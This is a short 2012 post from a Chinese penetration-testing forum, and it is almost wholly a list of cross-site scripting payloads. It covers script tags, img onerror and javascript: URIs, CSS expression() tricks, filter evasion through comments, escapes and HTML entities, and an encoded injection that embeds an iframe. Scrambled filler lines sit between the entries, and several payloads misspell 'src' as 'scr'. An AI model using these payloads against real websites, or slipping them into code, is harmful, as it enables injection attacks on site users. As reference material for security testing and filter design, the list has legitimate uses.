中国网络渗透测试联盟
标题:
xss
[打印本页]
作者:
admin
时间:
2012-9-15 14:09
标题:
xss
<script>alert("跨站")</script> (最常用)
) U* R3 n/ y w# _$ b2 \
<img scr=javascript:alert("跨站")></img>
! [* r* x, ~+ L) o
<img scr="javascript: alert(/跨站/)></img>
. ?9 f7 R' F4 b3 e* L
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
J H. w, }: ~ W. D" A
<img scr="#" onerror=alert(/跨站/)></img>
( ]# L3 H" n$ i) m- B9 v
<img scr="#" style="xss:expression(alert(/xss/));"></img>
' E9 Y, n# j1 J+ w. A) i' f9 u! ?3 o
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
" C6 P# e# f) [& u0 M
<img src=vbscript:msgbox ("xss")></img>
* j2 \) r+ ]" j4 \
<style> input {left:expression (alert('xss'))}</style>
8 S/ S& k8 |6 R3 P' Y. F
<div style={left:expression (alert('xss'))}></div>
) ^* ]7 L( [8 i3 W3 H7 v
<div style={left:exp/* */ression (alert('xss'))}></div>
1 p. x/ Z& N, n( O% L& n$ A
<div style={left:\0065\0078ression (alert('xss'))}></div>
9 }; S4 G2 w' V% H5 j
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
& W& t- L2 \6 F% h# F( N2 N
unicode <div style="{left:expRessioN (alert('xss'))}">
- b: E. R1 Q* d9 ?% _# B( x
' ~0 X' ~0 G: e7 I( v; D" ~' n
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
1 g2 ^' t- s0 e5 H
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2